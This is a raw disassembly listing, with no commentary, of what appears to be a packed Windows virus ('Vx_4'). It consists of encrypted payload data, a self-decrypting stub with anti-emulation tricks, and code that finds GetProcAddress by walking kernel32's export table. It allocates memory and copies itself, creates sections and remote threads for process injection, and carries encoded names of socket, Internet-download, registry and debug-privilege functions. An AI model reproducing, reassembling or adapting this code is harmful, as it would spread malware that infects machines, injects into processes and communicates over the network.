dd 88A85BCFh, 681D1CB8h, 0FB831218h, 0FD332753h, 88A8E192h
dd 9091E053h, 0FFE14B74h, 784C995Dh, 8A8D808h, 0D5169DB8h
dd 48DC910Dh, 0B8B0E258h, 0FB6BA188h, 951CA500h, 838DCCCh
dd 88F04899h, 8E4BF383h, 1829D0DEh, 0B00E13EEh, 0C0D06857h
dd 8AE8D808h, 80B34E99h, 7DE1FD23h, 9C0CEDEh, 3803BEC8h
dd 0DD95427Bh, 8A88CB4h, 0CC89EDAFh, 88685848h, 5E6D38F8h
dd 50D0D3DFh, 6B73B1B3h, 0A3507320h, 7A95E368h, 968F8B1h
dd 38816A4Dh, 3D1D908h, 511C0C3Ch, 48381535h, 0BEC523D8h
dd 0A3A89831h, 18216A3Dh, 396D4F88h, 0B8B8286Ch, 0FC685808h
dd 0F3C0DFFAh, 5E28FC4Ah, 96452B0Fh, 88A81831h, 0D9C1ECB7h
dd 580B888h, 33B8E8D8h, 0CDA68A4Dh, 0F62A1B34h, 86434CCh
dd 0DF03D27h, 0D21D848h, 5858D106h, 34B033DBh, 8B47B05Bh
dd 0BC2BD320h, 0A7EED410h, 0AEBD7377h, 63F8E861h, 1A41A0Bh
dd 9821AA3Dh, 2ABB88h, 417E6D51h, 0FB63D848h, 58ABD750h
dd 0E0287888h, 0C7875E0Dh, 0B10E6583h, 0B04EE8F8h, 0F7174E41h
dd 0C11EFDD3h, 0C2E35848h, 54522BF0h, 0E1AB36A3h, 5870A75Dh
dd 87A85809h, 0D819323Ch, 0A2DDBB88h, 7BB8A8E1h, 0C8D1AABDh
dd 30248478h, 88AFD87h, 7EF5A8D8h, 0FA2DF30Ch, 5B18A881h
dd 8E00E88Eh, 7B4797AEh, 0C851FEB5h, 536D28F8h, 724BFB3h
dd 38F9B3DBh, 0B1A4B308h, 9821CE2Dh, 5EDB788h, 7BB8E8D9h
dd 0C8D1AA8Dh, 0E0994E78h, 8D275D77h, 3878A824h, 0A3AA9883h
dd 0B048DCFBh, 0F7174EC1h, 0C11ED561h, 0D675848h, 5818281Ch
dd 31827D8Bh, 0BDFBA818h, 88E8617Ah, 9F336833h, 0C5EAB784h
dd 43B8E8D8h, 0BE7D04Fh, 0D81828BCh, 0B2AB80Bh, 0BD7BBC9Fh
dd 88E8E17Ah, 0EDE7B8EAh, 8A88136h, 0CDF0FDA7h, 0D325848h
dd 0EF9D2738h, 0E128F888h, 38F8A8C4h, 0DA7A734h, 0D818682Ch
dd 77D8608h, 78B8635Dh, 89AE5308h, 882C6B53h, 0F7DDA060h
dd 9EC59127h, 0FDA89831h, 0F29DEBCFh, 0BE8F8B1h, 0B8811ADDh
dd 42EDD108h, 0D31868C1h, 0CAADC388h, 4AF8E861h, 4E2D6300h
dd 0AA182881h, 86885E1h, 4FCA98D8h, 88E8C7E0h, 2456A578h
dd 0A03B903h, 368EADBh, 0C891128Dh, 0DB149DB8h, 3917A84Ch
dd 0E49C2CD7h, 4B73B369h, 618AAD77h, 8348F8C8h, 78C1DAEDh
dd 7EDEB008h, 71799747h, 8868B888h, 3F93E6ADh, 0B3E1AA04h
dd 5A17203Fh, 0F7D787B4h, 8AFDA791h, 35727F6h, 0FF99CC84h
dd 8E89CB9h, 874797A7h, 0C2E964E3h, 581848DCh, 0C81BB668h
dd 0BFDCA4D3h, 0C891F68Dh, 0EDA1E5B8h, 0B68B8ACh, 38819A5Dh
dd 2D4DBE08h, 0DBDE0336h, 4A036CCAh, 0C33E6ED4h, 0DA291FE0h
dd 5D18E8B8h, 81E8B888h, 0A6E7941Eh, 0C6DDD5CBh, 0E1868C0h
dd 3D546D77h, 0C07BA818h, 332C57F7h, 511868B8h, 4851EA0Dh
dd 2EB882D8h, 0BD5C4DF7h, 189D2838h, 88CFC87h, 0F853A8D8h
dd 8BC28858h, 301982E8h, 0C8E8B888h, 0A42D970Eh, 0B68183Dh
dd 0DC17D700h, 828FDB6h, 1AE2DD1h, 5255848h, 0D85851E2h
dd 310A2D05h, 2AE9E898h, 77B8D862h, 982DACEDh, 0F7D0FB88h
dd 3D742CD7h, 88C2D808h, 614E5D47h, 9D17B8C8h, 0F8F85DD8h
dd 8797A08Bh, 581CDD7Ch, 62AD7188h, 0BF8E861h, 0D96B5BC1h
dd 0DC7239E8h, 5EDD47D9h, 87B8A8E1h, 0C8DDB89Dh, 0D7D8AD78h
dd 82CA90Ch, 0B1B19BD8h, 0C891B68Dh, 949B9B8h, 7E8A7E0h
dd 6D473858h, 88286DA8h, 0DC17E87Dh, 828FC02h, 18A2DD1h
dd 306B5848h, 0D8180175h, 0FF50F303h, 388CD95Dh, 88E8D808h
dd 0DB1E5D68h, 4838150Dh, 3BAA9BD8h, 7F592FC9h, 229D6159h
dd 0B0E8F8B1h, 0F8B84C63h, 8B541383h, 1808457Dh, 0BFACB88h
dd 0CF095F99h, 0FE2DD1E9h, 1B182881h, 0E230F87h, 0F58D0B21h
dd 3FE7C05Bh, 81B3C3Bh, 20E913C1h, 2F978DBh, 0E6C1AF57h
dd 0DB059C41h, 7AE9B4F2h, 0C4F3E3B8h, 8B7C1A83h, 1C9538BAh
dd 0D1DF07C0h, 0BDC3697Bh, 88E86162h, 0FC4CE37Bh, 87A88B98h
dd 78B8505Ah, 47631B08h, 65952393h, 86840C6h, 0BA72324h
dd 0E99474C1h, 2224EECAh, 28C4BAFFh, 8CE454F2h, 0FC4664E4h
dd 2D181425h, 83E11B60h, 60BD9559h, 83DC584Dh, 8A5B3B85h
dd 3BEDB788h, 0F3471727h, 0C1BFE50Bh, 5C176B36h, 0F7D787AEh
dd 6D3BFFE5h, 932CD746h, 65E71747h, 3ADBFBDFh, 7A8EC57h
dd 0D855A7F7h, 57577CABh, 0F7D7FD0Ch, 0D0239BA7h, 7757A625h
dd 26E0ECB7h, 0DA5B4777h, 78B8FE30h, 77873008h, 0D8F0D787h
dd 55287888h, 17F24559h, 0B541D848h, 3C18E8BBh, 0BD638A77h
dd 0F8F8512Ah, 0EE4AD16Ch, 2551679h, 0B0E7D87h, 6673A858h
dd 0EE765B34h, 9D485339h, 0B7E3D87h, 3B4FE8D8h, 88C8D81Eh
dd 0D19D2778h, 0FE28788Bh, 0B37AF49Bh, 0CA7F846h, 5818EA44h
dd 0F169B46Bh, 0F8B86959h, 8A86DE07h, 95F028F8h, 7D70776h
dd 38FA4BDAh, 98E2D308h, 601422BBh, 869B888h, 92560089h
dd 1DD827F7h, 0D8581C57h, 0BD185839h, 38389CE8h, 4156F862h
dd 0B00C90E0h, 0F717525Ch
dd 6CB7BADDh, 0B98A8BCAh, 182C196Dh, 60CD1388h, 38F8A85Eh
dd 88AE3051h, 304068B8h, 0F797523Ch, 4C916D52h, 0C6ED848h
dd 982C0152h, 21ADF088h, 0DA78E8ECh, 0B92D2FE8h, 5018A88Ch
dd 7DE8B888h, 0D305E851h, 8968183Ch, 0DDEFED8Ch, 868CCB9h
dd 39F8A85Bh, 3528437Ch, 0D8585C91h, 88D8CC8Dh, 388CC265h
dd 2F9CDD08h, 0EC3395F8h, 7C2D78C8h, 9FD5F46h, 88A8983Ch
dd 2C98E8B8h, 21553881h, 0FAB8286Ch, 2DEBD17Fh, 58581156h
dd 0FCA71088h, 0F81057A7h, 6057A7F5h, 0D8186A9Dh, 311E2503h
dd 0A650E898h, 871727F4h, 0D81A23FCh, 7A9DF388h, 0B378E8E1h
dd 56ABE456h, 0A7E53750h, 0FD6AB777h, 79B86859h, 88087C42h
dd 0A693C8F8h, 722BAEDAh, 2882AB4Ch, 0BC99DDFFh, 0D81868F8h
dd 61DA888h, 4C845D55h, 563D848h, 0D8583815h, 0B17FDC7Bh
dd 3878A1D7h, 98A86D85h, 0FDEBE8F8h, 0A0BB839h, 7D4FCCABh
dd 88286C39h, 481828F8h, 8807C87h, 4B07A858h, 79C7B020h
dd 4D939747h, 828812Eh, 0FCB73A5Dh, 88E8D89Ah, 0E16A9DF3h
dd 42A378C8h, 1C3229C8h, 68A8D868h, 2B10A293h, 0B218B8Ah
dd 75837C2Ah, 88284865h, 4875A573h, 5E5AF8C8h, 0BBDC94D3h
dd 0C8B835ADh, 7F9B68B8h, 868B8E5h, 70C263D8h, 8BE09209h
dd 53EFAF8Fh, 4811FE0Dh, 9FD5FD8h, 0C8A8983Ch, 2C18E8B8h
dd 0BF04F8Ah, 0C891642Ah, 0B1C6ED81h, 2B9328B8h, 0FF18F9A0h
dd 78CC99DDh, 88A81808h, 2F1A1CB8h, 0BC80E990h, 21471724h
dd 0FBEBD4E3h, 0D46A0350h, 0ACDB2ED9h, 8DF5F187h, 88E8EC34h
dd 6474C4Bh, 857A8987h, 0F8B9BADFh, 0A7FD6208h, 2D1868CCh
dd 70FA918Eh, 0B0EA9C0Eh, 4440A758h, 82E79767h, 0B64F203h
dd 0FD4FF892h, 88A8EC39h, 0C8182878h, 7D2E3905h, 96F521CBh
dd 8BA89831h, 1808853Dh, 654F3B88h, 0F8B86858h, 77401B23h
dd 1821564Dh, 5AAF7188h, 0B7F8A858h, 0D5F784Eh, 0D8585C89h
dd 8868B888h, 90EAEFACh, 7717212Fh, 7695A322h, 0EB2838B1h
dd 103321DBh, 3B89283h, 18219E3Dh, 0A28188h, 0B2316B2Bh
dd 982A5900h, 58404B7Bh, 31527D03h, 490A818h, 89A8582Ch
dd 0D94160FAh, 9DE2E8CBh, 78F8DCF7h, 0BCD95DFFh, 0D8182838h
dd 0E5C6888h, 281525DBh, 881ED848h, 6C296D4Fh, 8E8B8C8h
dd 0ECCD685Ah, 0D9F9EF6h, 58581CC9h, 82CF888h, 8D72AE2Dh
dd 88E86C38h, 0EC29ED4Fh, 4868B8C8h, 73CDE8D8h, 4AEADF82h
dd 3ACE2AD2h, 8221937Fh, 92BA9ADFh, 7F4A0E0Ah, 0D37C3A8Bh
dd 0A67DCAAh, 0AE05EB00h, 88681831h, 0A390ACF7h, 0BDD70777h
dd 38B8912Ah, 0BD6CCDF7h, 6DE768F8h, 82881E6h, 4D847D27h
dd 565D848h, 0D8581122h, 314AED05h, 6A29A898h, 3D57D862h
dd 5858D1EEh, 3D502D77h, 4D476818h, 8828615Eh, 6D24BD07h
dd 0BDA5F8C8h, 38B89016h, 0B1FAEDF7h, 274E68F8h, 485D0C1Dh
dd 2E1D6BD8h, 88E89831h, 0D818C0BBh, 62757888h, 719529D9h
dd 0D0A8983Bh, 0DDD9E748h, 8A8AD08h, 7B7BA8DDh, 8798A7C0h
dd 4D98AD39h, 35EBF8C8h, 38D2A848h, 9CE447Dh, 0B4144CC4h
dd 687BCDF9h, 87472C30h, 60EDADF7h, 27E7D306h, 0F7D7AA60h
dd 0C756C927h, 0BCFEA025h, 583D50AAh, 0E088B888h, 74797FDh
dd 0CCE3617Dh, 0ED9518DCh, 868C0C6h, 5EF0F8D3h, 8AAE6289h
dd 0B04E4DCBh, 897B888h, 78D22C53h, 1D17885Ah, 0D8581D80h
dd 8920BC0Bh, 747F4E6h, 0BABAD54h, 73F0EC7Eh, 0E0174773h
dd 7479727h, 0FCD09B69h, 0B31828F8h, 8074039h, 2810A858h
dd 4AA85808h, 0E8A06898h, 0E068B888h, 78B8E8DBh, 5E8FCCAh
dd 15140C2Ch, 8D0FBA6h, 0D018B1A4h, 88A8D808h, 683CBC33h
dd 89F233D5h, 0B88C7BB5h, 6D51B008h, 9A79D707h, 92AF88Ch
dd 3DFFAE5Bh, 0CD4F9672h, 0FBDFB965h, 171A0A30h, 64h, 27BAh dup(0)
db 90h
; ---------------------------------------------------------------------------
cld
stc
sub esi, esi
sub ecx, ecx
jmp short $+2
mov ecx, ecx
mov cl, 55h
mov eax, eax
cld
loc_31438010: ; CODE XREF: UPX2:31438015�j
lea esi, [esi+1]
stc
stc
loop loc_31438010
cld
cld
xchg ebx, ebx
xchg ebx, ebx
call sub_3143804F
nop
stc
add ecx, 35h
push ecx
mov edx, 29CCh
mov ecx, ecx
loc_31438032: ; CODE XREF: UPX2:31438046�j
mov al, [ecx]
cmc
xor ax, si
cld
mov [ecx], al
add ecx, 1
inc esi
sub edx, 1
cld
cmp edx, 0
jnz short loc_31438032
pop ecx
stc
jmp ecx
; ---------------------------------------------------------------------------
stc
xchg ebx, ebx
; =============== S U B R O U T I N E =======================================
sub_3143804F proc near ; CODE XREF: UPX2:3143801D�p
pop ecx
nop
jmp ecx
sub_3143804F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 89h, 0DBh
db 89h, 0DBh
; ---------------------------------------------------------------------------
call $+5
cld
mov eax, [esp]
mov ecx, [eax+29BBh]
mov [eax+3303h], ebx
and ecx, 400000h
mov ebx, [esp+4]
jz short loc_314380A4
pop ecx
mov [eax+3307h], esi
mov cl, [eax+29BFh]
mov [eax+330Bh], edi
cmp cl, 0E8h
jz short loc_31438098
mov ebx, [eax+29C1h]
jmp short loc_314380A2
; ---------------------------------------------------------------------------
loc_31438098: ; CODE XREF: UPX2:3143808E�j
mov ecx, [eax+29C0h]
mov ebx, [ecx+ebx+2]
loc_314380A2: ; CODE XREF: UPX2:31438096�j
mov ebx, [ebx]
loc_314380A4: ; CODE XREF: UPX2:31438076�j
push ebp
mov ebp, eax
sub dword ptr [esp+4], 0E05Ch
sub ebp, 101005h
mov edi, [esp+4]
lea esi, [ebp+1039CCh]
mov ecx, 0
rep movsb
sldt cx
test ecx, ecx
jnz short loc_314380D2
or eax, 0FFFFFFFFh
int 2Eh ; DOS 2+ internal - EXECUTE COMMAND
; DS:SI -> counted CR-terminated command string
loc_314380D2: ; CODE XREF: UPX2:314380CB�j
and ebx, 0FFFFF000h
loc_314380D8: ; CODE XREF: UPX2:314380E7�j
cmp dword ptr [ebx+4Eh], 73696854h
jz short loc_314380E9
loc_314380E1: ; CODE XREF: UPX2:314380F6�j
sub ebx, 100h
jnz short loc_314380D8
loc_314380E9: ; CODE XREF: UPX2:314380DF�j
mov eax, ebx
add eax, [ebx+3Ch]
mov edx, [eax+78h]
cmp word ptr [eax], 4550h
jnz short loc_314380E1
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_31438103: ; CODE XREF: UPX2:loc_31438117�j
lodsd
add eax, ebx
cmp word ptr [eax+2], 5074h
jnz short loc_31438117
cmp dword ptr [eax+5], 6441636Fh
jz short loc_3143811C
loc_31438117: ; CODE XREF: UPX2:3143810C�j
loop loc_31438103
pop ecx
jmp short loc_31438147
; ---------------------------------------------------------------------------
loc_3143811C: ; CODE XREF: UPX2:31438115�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
lea eax, [ebp+101137h]
lea ecx, [ebp+101120h]
mov dx, [eax-19h]
call ecx
jmp short loc_3143818E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_314381D5
loc_31438147: ; CODE XREF: UPX2:3143811A�j
; sub_314381D5+10�j ...
mov eax, [ebp+1039C0h]
and eax, 400000h
jz short loc_31438173
lea esi, [ebp+1039C4h]
lodsd
mov edi, [esp+arg_0]
stosd
mov ebx, [ebp+104308h]
movsb
mov edi, [ebp+104310h]
mov esi, [ebp+10430Ch]
loc_31438173: ; CODE XREF: sub_314381D5-83�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_314381D5
; ---------------------------------------------------------------------------
aam 5Dh
push ebx
mov ecx, 2889h
mov ebx, edx
loc_3143817F: ; CODE XREF: UPX2:3143818A�j
xor [eax], dl
sub dl, bl
add eax, 1
xchg bl, bh
xchg dl, dh
loop loc_3143817F
pop ebx
retn
; ---------------------------------------------------------------------------
loc_3143818E: ; CODE XREF: UPX2:31438145�j
call near ptr loc_3143819D+2
inc ebx
insb
outsd
jnb short near ptr loc_314381FA+3
dec eax
popa
outsb
db 64h
insb
loc_3143819D: ; CODE XREF: UPX2:loc_3143818E�p
add gs:[ebx-1], dl
setalc
mov [ebp+103E62h], eax
call near ptr loc_314381B9+1
inc ebx
jb short loc_31438215
popa
jz short near ptr loc_31438217+1
inc ebp
jbe short near ptr loc_31438217+4
outsb
jz short loc_314381FA
loc_314381B9: ; CODE XREF: UPX2:314381A8�p
add [ebx-1], dl
setalc
mov [ebp+103E66h], eax
call sub_314381D5
inc edi
db 65h
jz short near ptr loc_31438217+1
popa
jnb short near ptr loc_31438241+2
inc ebp
jb short near ptr loc_31438241+3
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_314381D5 proc near ; CODE XREF: UPX2:314381C3�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 31438147 SIZE 0000002E BYTES
; FUNCTION CHUNK AT 3143858B SIZE 0000000B BYTES
push ebx
call esi ; lstrcatA
mov [ebp+103E6Ah], eax
call sub_314385B6
test eax, eax
jz loc_31438147
push eax
call dword ptr [ebp+103E6Ah]
test eax, eax
jnz loc_3143858B
loc_314381FA: ; CODE XREF: UPX2:314381B7�j
; UPX2:31438196�j
cmp byte ptr [ebp+10153Fh], 1
jnz short loc_31438217
push dword ptr [ebp+104308h]
dec byte ptr [ebp+10153Fh]
pop dword ptr [ebp+101598h]
loc_31438215: ; CODE XREF: UPX2:314381AE�j
jmp short loc_3143821E
; ---------------------------------------------------------------------------
loc_31438217: ; CODE XREF: sub_314381D5+2C�j
; UPX2:314381B1�j ...
and dword ptr [ebp+101598h], 0
loc_3143821E: ; CODE XREF: sub_314381D5:loc_31438215�j
and dword ptr [ebp+101588h], 0
and dword ptr [ebp+10158Ch], 0
and dword ptr [ebp+101590h], 0
push edi
mov byte ptr [ebp+1012D4h], 1
mov [ebp+103E6Eh], esi
loc_31438241: ; CODE XREF: UPX2:314381CD�j
; UPX2:314381D0�j
lea esi, [ebp+101604h]
xor ecx, ecx
lea edi, [ebp+103E7Ah]
mov cl, 20h
call sub_314385F3
pop edi
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jz loc_3143833A
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+103E72h], eax
push 7328h
push 0
call dword ptr [ebp+103EF2h]
test eax, eax
jz loc_3143858B
xchg eax, edi
lea esi, [ebp+101000h]
mov ebp, edi
mov ecx, 0CCAh
sub ebp, 101000h
lea edx, [ebp+101254h]
rep movsd
jmp edx
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+101B4Dh]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+103E72h]
add esp, 20h
test eax, eax
jz loc_3143858B
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+103E72h]
test eax, eax
jz loc_3143858B
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+103E72h]
push 1000Ah
call dword ptr [ebp+103E72h]
call loc_3143832A
jmp loc_3143858B
; ---------------------------------------------------------------------------
loc_3143832A: ; CODE XREF: sub_314381D5+14B�p
; sub_314381D5+162�j
push 0
pop ecx
jecxz short locret_31438339
push 0Ah
call dword ptr [ebp+103EE6h]
jmp short loc_3143832A
; ---------------------------------------------------------------------------
locret_31438339: ; CODE XREF: sub_314381D5+158�j
retn
; ---------------------------------------------------------------------------
loc_3143833A: ; CODE XREF: sub_314381D5+8B�j
cmp dword ptr [ebp+103E92h], 0
jz loc_3143858B
call near ptr loc_31438351+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_31438351: ; CODE XREF: sub_314381D5+172�p
add bh, bh
sub_314381D5 endp ; sp-analysis failed
xchg eax, ebp
scasb
db 3Eh
adc [eax], al
lea esi, [ebp+1017DEh]
xor ecx, ecx
lea edi, [ebp+103EFAh]
mov cl, 0Eh
xchg eax, ebx
call sub_314385F3
cmp dword ptr [ebp+103F2Eh], 0
jz loc_3143858B
mov eax, [ebp+103EFEh]
push dword ptr [eax+1]
pop dword ptr [ebp+103917h]
mov eax, [ebp+103F16h]
push dword ptr [eax+1]
pop dword ptr [ebp+103964h]
mov eax, [ebp+103F02h]
push dword ptr [eax+1]
pop dword ptr [ebp+10396Bh]
cmp dword ptr [ebp+10396Bh], 10000h
jnb loc_3143858B
mov ecx, [ebp+103F06h]
jecxz short loc_314383DA
push dword ptr [ecx+1]
pop dword ptr [ebp+103978h]
mov ecx, [ebp+103F0Eh]
jecxz short loc_314383DA
push dword ptr [ecx+1]
pop dword ptr [ebp+103985h]
loc_314383DA: ; CODE XREF: UPX2:314383BE�j
; UPX2:314383CF�j
call sub_31438597
lea edi, [ebp+103F84h]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+1015EBh]
mov ecx, 19h
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
lea edx, [ebp+103E30h]
loc_31438423: ; CODE XREF: UPX2:3143842C�j
lodsb
mov [edx], ax
stosw
add edx, 2
loop loc_31438423
mov edx, esp
push 0
push 7328h
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+103F0Ah]
pop eax
add esp, 40h
push 7328h
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 7328h
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+103F12h]
pop edi
pop ecx
test edi, edi
jz loc_3143858B
lea esi, [ebp+101000h]
mov ecx, 0CCAh
mov ebp, edi
rep movsd
sub ebp, 101000h
lea eax, [ebp+10144Ah]
jmp eax
; ---------------------------------------------------------------------------
db 50h, 54h, 6Ah
dd 0FFFF6A20h, 103F1A95h, 5FC08500h, 4FE83475h, 0E8000001h
dd 11h, 65446553h, 50677562h, 69766972h, 6567656Ch, 50E85700h
dd 0FF000005h, 104288B5h, 9E95FF00h, 5700103Eh, 3E6295FFh
dd 6A0010h, 95FF026Ah, 103E92h, 128B9h, 0E12B9700h, 54240C89h
dd 0D695FF57h, 3300103Eh, 72A583F6h, 103Fh, 95FF5754h
dd 103EDAh, 6674C085h, 4FE8346h, 74FFEE72h, 6A0824h, 95FF2A6Ah
dd 103ED2h, 0DC74C085h, 588E893h, 0C9330000h, 393AE391h
dd 103F7285h, 81327500h, 6324247Ch, 74737273h, 0AFC18128h
dd 5000000Eh, 51565054h, 0FF535050h, 103E8A95h, 59C08500h
dd 74FF0F74h, 858F0824h, 103F72h, 0FFFDB5E8h, 95FF53FFh
dd 103E62h, 0C4818EEBh, 128h, 6295FF57h
db 3Eh, 10h, 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_314381D5
loc_3143858B: ; CODE XREF: sub_314381D5+1F�j
; sub_314381D5+B2�j ...
call dword ptr [ebp+103E62h]
jmp loc_31438147
; END OF FUNCTION CHUNK FOR sub_314381D5
; ---------------------------------------------------------------------------
db 0
; =============== S U B R O U T I N E =======================================
sub_31438597 proc near ; CODE XREF: UPX2:loc_314383DA�p
; sub_314385B6+2�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
mov eax, esp
push 0
push eax
push 0Ch
mov eax, esp
jmp edx
sub_31438597 endp
; ---------------------------------------------------------------------------
aVx_4 db 'Vx_4',0
align 2
; =============== S U B R O U T I N E =======================================
sub_314385B6 proc near ; CODE XREF: sub_314381D5+9�p
; UPX2:loc_31438FB1�p
xor ecx, ecx
call sub_31438597
lea edx, [ebp+101559h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+103E66h]
add esp, 20h
retn
sub_314385B6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 8Bh, 0FFh
db 58h
dd 28005858h, 73000033h, 100000Eh, 2 dup(0)
dd 0C0000000h, 29h
db 3 dup(0)
; =============== S U B R O U T I N E =======================================
sub_314385F3 proc near ; CODE XREF: sub_314381D5+7C�p
; UPX2:31438369�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+103E6Eh]
stosd
pop ecx
loc_314385FE: ; CODE XREF: sub_314385F3+E�j
lodsb
test al, al
jnz short loc_314385FE
loop sub_314385F3
retn
sub_314385F3 endp
; ---------------------------------------------------------------------------
dw 958Dh
dd 101985h, 0C695FF52h, 8900103Eh, 10428885h, 16E800h
dd 6F4C0000h, 70756B6Fh, 76697250h, 67656C69h, 6C615665h
dd 416575h, 6E95FF50h, 8900103Eh, 10428C85h, 425CC300h
dd 4E657361h, 64656D61h, 656A624Fh, 5C737463h, 65537456h
dd 6C007463h, 6C727473h, 43006E65h, 74616572h, 6C694665h
dd 43004165h, 74616572h, 6C694665h, 70614D65h, 676E6970h
dd 72430041h, 65746165h, 636F7250h, 41737365h, 65724300h
dd 52657461h, 746F6D65h, 72685465h, 646165h, 61657243h
dd 68546574h, 64616572h, 65724300h, 54657461h, 686C6F6Fh
dd 33706C65h, 616E5332h, 6F687370h, 78450074h, 68547469h
dd 64616572h, 6C694600h, 6D695465h, 536F5465h, 65747379h
dd 6D69546Dh, 72460065h, 694C6565h, 72617262h, 65470079h
dd 6C694674h, 74744165h, 75626972h, 41736574h, 74654700h
dd 656C6946h, 657A6953h, 74654700h, 656C6946h, 656D6954h
dd 74654700h, 75646F4Dh, 6148656Ch, 656C646Eh, 65470041h
dd 6D655474h, 6C694670h, 6D614E65h, 47004165h, 65547465h
dd 6150706Dh, 416874h, 56746547h, 69737265h, 47006E6Fh
dd 65567465h, 6F697372h, 4178456Eh, 74654700h, 756C6F56h
dd 6E49656Dh, 6D726F66h, 6F697461h, 4C00416Eh, 4C64616Fh
dd 61726269h, 417972h, 5670614Dh, 4F776569h, 6C694666h
dd 704F0065h, 69466E65h, 614D656Ch, 6E697070h, 4F004167h
dd 506E6570h, 65636F72h, 50007373h, 65636F72h, 32337373h
dd 73726946h, 72500074h, 7365636Fh, 4E323373h, 747865h
dd 46746553h, 41656C69h, 69727474h, 65747562h, 53004173h
dd 69467465h, 6954656Ch, 5300656Dh, 7065656Ch, 73795300h
dd 546D6574h, 54656D69h, 6C69466Fh, 6D695465h, 6E550065h
dd 5670616Dh, 4F776569h, 6C694666h, 69560065h, 61757472h
dd 6C6C416Ch, 5700636Fh, 65746972h, 656C6946h, 41744E00h
dd 73756A64h, 69725074h, 656C6976h, 54736567h, 6E656B6Fh
dd 43744E00h, 74616572h, 6C694665h, 744E0065h, 61657243h
dd 72506574h, 7365636Fh, 744E0073h, 61657243h, 72506574h
dd 7365636Fh, 784573h, 7243744Eh, 65746165h, 74636553h
dd 6E6F69h, 7243744Eh, 65746165h, 72657355h, 636F7250h
dd 737365h, 614D744Eh, 65695670h, 53664F77h, 69746365h
dd 4E006E6Fh, 65704F74h, 6C69466Eh, 744E0065h, 6E65704Fh
dd 636F7250h, 54737365h, 6E656B6Fh, 4F744E00h, 536E6570h
dd 69746365h, 4E006E6Fh, 6F725074h, 74636574h, 74726956h
dd 4D6C6175h, 726F6D65h, 744E0079h, 72657551h, 666E4979h
dd 616D726Fh, 6E6F6974h, 656B6F54h, 744E006Eh, 74697257h
dd 72695665h, 6C617574h, 6F6D654Dh, 52007972h, 6E556C74h
dd 646F6369h, 72745365h, 54676E69h, 736E416Fh, 72745369h
dd 676E69h, 53415357h, 74726174h, 63007075h, 65736F6Ch
dd 6B636F73h, 63007465h, 656E6E6Fh, 67007463h, 6F687465h
dd 79627473h, 656D616Eh, 63657200h, 65730076h, 7300646Eh
dd 656B636Fh, 6E490074h, 6E726574h, 6C437465h, 4865736Fh
dd 6C646E61h, 6E490065h, 6E726574h, 65477465h, 6E6F4374h
dd 7463656Eh, 74536465h, 657461h, 65746E49h, 74656E72h
dd 6E65704Fh, 6E490041h, 6E726574h, 704F7465h, 72556E65h
dd 4900416Ch, 7265746Eh, 5274656Eh, 46646165h, 656C69h
dd 41564441h, 32334950h, 4C4C442Eh, 67655200h, 736F6C43h
dd 79654B65h, 67655200h, 6E65704Fh, 4579654Bh, 52004178h
dd 75516765h, 56797265h, 65756C61h, 417845h, 53676552h
dd 61567465h, 4565756Ch, 56004178h, 26AF633h, 0D48B5656h
dd 0FF52016Ah, 0FF561872h, 10428C95h, 56C48B00h, 56505656h
dd 0FF1870FFh, 103EFA95h, 10C48300h, 8C25Eh, 2BFB498Dh
dd 6851C8h, 8DE80000h, 6A03244Ch, 51056A00h, 56A5350h
dd 8B50CC8Bh, 6A5450D4h, 53525140h, 3F2295FFh, 0C4830010h
dd 2A95FF0Ch, 8300103Fh, 8DC308C4h, 103E3095h, 6AC93300h
dd 30685200h, 8B003200h, 6A5151C4h, 6A515040h, 8C08318h
dd 500E6A54h, 3F1E95FFh, 0C4830010h, 85D23320h, 0C2990FC0h
dd 2358DAF7h, 3357C3C2h, 0FFC1E8FFh, 840FFFFFh, 0A5h, 73286850h
dd 0D48B0000h, 0CC8B006Ah, 68406Ah, 6A001000h, 6A5202h
dd 732868h, 51006A00h, 95FF5053h, 103F12h, 95FF595Fh, 103E62h
dd 7174FF85h, 15908D8Bh, 0CE30010h, 1000958Dh, 0D1030010h
dd 0D2FF5357h, 3EFE858Bh, 8F8D0010h, 2916h, 0FFFF2BE8h
dd 16858BFFh, 8D00103Fh, 29638Fh, 0FF1AE800h, 858BFFFFh
dd 103F02h, 296A8F8Dh, 9E80000h, 8BFFFFFFh, 103F0685h
dd 74C08500h, 778F8D20h, 0E8000029h, 0FFFFFEF4h, 3F0E858Bh
dd 0C0850010h, 8F8D0B74h, 2984h, 0FFFEDFE8h, 5FC78BFFh
dd 0E855C3h, 5D000000h, 1B24ED81h, 0C9330010h, 1EAF858Dh
dd 54510010h, 51505151h, 8E95FF51h, 8700103Eh, 95FF2404h
